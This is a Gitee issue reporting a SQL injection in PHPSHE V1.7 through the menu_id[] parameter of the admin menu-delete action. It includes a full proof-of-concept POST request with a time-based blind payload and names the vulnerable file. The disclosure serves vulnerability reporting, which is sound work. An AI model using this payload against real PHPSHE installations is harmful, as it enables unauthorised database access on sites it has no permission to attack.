17 Star 49 Fork 17

koyshe / phpshe

 / 详情

PHPSHE V1.7 is vulnerable to SQL injection.

待办的
创建于  
2019-03-15 09:09

PHPSHE V1.7 is vulnerable to SQL injection vulnerabilities. Attackers can inject sql statement via the menu_id[] parameter to the server.

Poc:

POST /phpshe/admin.php?mod=menu&act=del&token=1dc02be6d9710d51e89a116af232dced HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/phpshe/admin.php?mod=menu
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Cookie: PHPSESSID=0a97c3f86f5b63a3e74ffcdf1c70b59c
Connection: close
Upgrade-Insecure-Requests: 1

menu_order%5B1%5D=1&menu_order%5B2%5D=2&menu_order%5B3%5D=3&menu_order%5B4%5D=4&menu_id%5B%5D=6'+and+IF(1=1,sleep(2),1)+and+'1'='1&menu_order%5B6%5D=6

vulnerability verification:

the lines of code where the vulnerability exist:
module/admin/menu.php

评论 (0)

lemon 创建了任务

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
PHP
1
https://gitee.com/koyshe/phpshe.git
git@gitee.com:koyshe/phpshe.git
koyshe
phpshe
phpshe

搜索帮助